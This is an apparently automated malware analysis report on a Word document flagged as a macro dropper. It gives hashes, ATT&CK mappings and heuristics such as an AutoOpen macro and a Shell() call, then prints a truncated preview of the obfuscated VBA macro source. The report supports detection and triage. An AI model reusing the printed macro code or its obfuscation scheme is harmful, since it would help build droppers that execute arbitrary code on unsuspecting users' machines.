Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1706fbe760eab15d…

MALICIOUS

Office (OLE)

Size: 181.0 KB
Created: 2018-02-27 14:17:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: d2e69d8be678035ca493970d50bb5fcb
SHA-1: b3fc77d5086f16330b011aab7da4190300166234
SHA-256: 1706fbe760eab15d7b66ce7af36c484b20553554010b0e99ea9aee7d291d6a8e
Risk Score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The presence of an AutoOpen macro and a Shell() call strongly indicates that the macro is designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent' further suggests its role as a dropper for other malware. No specific family could be identified due to heavy obfuscation in the VBA script.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6458242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458242-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 63291 bytes
SHA-256: 08e957607cdcca7adebaa2ecd4281ab3ee8c7e0ac2f0435db51b93efc18c4eff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oXFzZmt"
Sub YLifjSNaN()
   On Error Resume Next
   Do While SzJFAu Xor EOUpHtdQwj
      Dim fSOazBViuZOp
      Do While wVmptvjXKT Or YZjRRBOl
         YvutrAIkRADq = 6025 - Atn(tslHoWCzR / CByte(7) + zuCaUERt + Hex(cDCBbsz)) + (171376742 / nwGKPdwfofKMs) * (5938624 * ChrW(520437311) + oGbvzoZnfAH * OVqrJOqiPwLJj)
      Loop
      DujYHjSu = 6025 - Atn(vZjtISA / CByte(7) + GDWPdozW + Hex(WNTpvRLikfGGsa)) + (171376742 / TGvRcVhLO) * (5938624 * ChrW(520437311) + FGNBaGjCLKF * aAHVLXntMN)
      Do
         wvWtftaoCE = qLwjKY * CDate(426718607 * Atn(EhQUsjvJH - Fix(JXVSrd * CDate(8832))) * GENDIlVC / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(QJwXiNPVI) / LbCqzVmQiij - ChrB(872) / whhaGLTvvvSWP + Chr(778 / Atn(48 * Round(NkivIzKLSoDN / CBool(2)))) / (1199 / CByte(hWVqXmZ * 8 + OpEHDCM * CDbl(39)))
      Loop Until QJjaMICmjWkj <= PtXswlZZEujp
      zuaoEzwaBi = mDZUiHBCt + wvjPHQnLL
   Loop
   Set wllJHMu = miMOOAFt
End Sub
Function UWUoQRtW()
On Error Resume Next
uqztU = "EjlP&CzrEvpShaFjlziTop"
DdwZEhc = NwmrUicYHQ = 6025 - Atn(jOiwY / CByte(7) + XjviiWMuJS + Hex(fskvphdhLwGH)) + (171376742 / tWTYQzBjFhDODt) * (5938624 * ChrW(520437311) + aZzKMrtOfI * jEONhQcwpMCnd)
BQPVvEj = QFZLhhl = 6025 - Atn(zHlzvuIzHoPW / CByte(7) + zRrzmlHD + Hex(YlTzwlTC)) + (171376742 / bIsFHciUhnpENX) * (5938624 * ChrW(520437311) + uSniMu * ikjizfwwWjEpoN)
ZPqDoAjhaAI = iuivbdfghnkjgyugjn(uqztU, 15, 4)
tILpKilTn = "VtAOIubrUw&&BuKnWjqZM=%hWBuPapmzh"
zGMwvfOTj = miSjCVS = 6025 - Atn(aoSkFArijOsOlm / CByte(7) + JDHrjfkWIS + Hex(mHAISD)) + (171376742 / SLTRjOkvjN) * (5938624 * ChrW(520437311) + KpczCJ * vdmQpSKRAOk)
rLPzicbE = XwplTaIrWtH = 6025 - Atn(wXQzddmErdWZ / CByte(7) + CWAGPNVKzpKVD + Hex(ZuRICW)) + (171376742 / RSCNo) * (5938624 * ChrW(520437311) + cfqtZPvRE * lHflZz)
pJIcZjcV = iuivbdfghnkjgyugjn(tILpKilTn, 5, 19)
STdVTqHvGwJ = "tjmMHwVNkVUtes&&eh=%5rav% tAFOLGVW "
bKccVEjQl = tBLUdpTisja = 6025 - Atn(bPwbYzXDGttNiG / CByte(7) + VAOlwNocOQX + Hex(EAPajsSasMMFL)) + (171376742 / TZAIwlWFz) * (5938624 * ChrW(520437311) + duclmmjKBDS * rSMVQ)
lSZlwQJEsqD = rJoJaduPcGS = 6025 - Atn(XwDhzlPjoFcB / CByte(7) + HCQhh + Hex(cVqOotTTzrWKcs)) + (171376742 / fUAJVbF) * (5938624 * ChrW(520437311) + rljmFTadhvL * QjkOodRQoRvzJ)
UHrRHjCDG = iuivbdfghnkjgyugjn(STdVTqHvGwJ, 9, 16)
fiVWDViz = "vrafanbwsafAIvqsm=%LhlrwfHwlAJLSfXjjkzOt"
CkzIWFcYR = RciocrzUw = 6025 - Atn(wWcOuhG / CByte(7) + flmHVfCT + Hex(MYzAHW)) + (171376742 / LWBOrTkW) * (5938624 * ChrW(520437311) + bcHTukTZPv * iKGwmIjkvzJqAJ)
NBFiIPdiPD = YjrZM = 6025 - Atn(PdtCu / CByte(7) + NbFXlMYkAPDcij + Hex(biRmHKqMnhpivS)) + (171376742 / MvrIWIqbYib) * (5938624 * ChrW(520437311) + DIdPqdCoz * QnpXPRqvdc)
AnfLjL = iuivbdfghnkjgyugjn(fiVWDViz, 8, 17)
XqlcB = "qcUkdlhToQIUTes&&CKkZbLpzSSS=%mLjbdwTWN"
lhTRhswcs = djGOwLSR = 6025 - Atn(hdEwom / CByte(7) + piajBWzOOhR + Hex(fbPUums)) + (171376742 / LBMriRAZbfMSmP) * (5938624 * ChrW(520437311) + AMEQGisAQuG * jRJKMwnVoWiE)
uIjFwXaj = VXmiVzZQtPH = 6025 - Atn(VlPTAwzYjUHSV / CByte(7) + Vwtud + Hex(zjkLFSuvjU)) + (171376742 / CBUqLYCnakjD) * (5938624 * ChrW(520437311) + PUMVd * XzlcqpAENi)
nDSjH = iuivbdfghnkjgyugjn(XqlcB, 10, 17)
rTSkM = "MXirwcsYKBsDI% tesXERHsuTjhUM"
nrnzimMk = uNzCQvipGot = 6025 - Atn(NbwwAdZ / CByte(7) + MnCSviqC + Hex(rbBXtjOkk)) + (171376742 / wHBQUGwoajMfHq) * (5938624 * ChrW(520437311) + VGLjHlEf * PNsnTshN)
zHECjVpwJB = faMKWiM = 6025 - Atn(qQTLLTLFXcDEcM / CByte(7) + ckBGOIUhBzQcP + Hex(LkcUJv)) + (171376742 / LFDthhvQiJmT) * (5938624 * ChrW(520437311) + jZVbzpViSLv * wAMrajTQFRizN)
EGVvpluBuO = iuivbdfghnkjgyugjn(rTSkM, 12, 6)
mhIhnN = "GjQCies&&!%2rav%BuzhXGipYho"
hICtWOwwOc = fNRLctKjEVVHWc = 6025 - Atn(GZGbj / CByte(7) + lGwOJbLwmYqf + Hex(nDtwiJfGikiVSU)) + (171376742 / jzQ
... (truncated)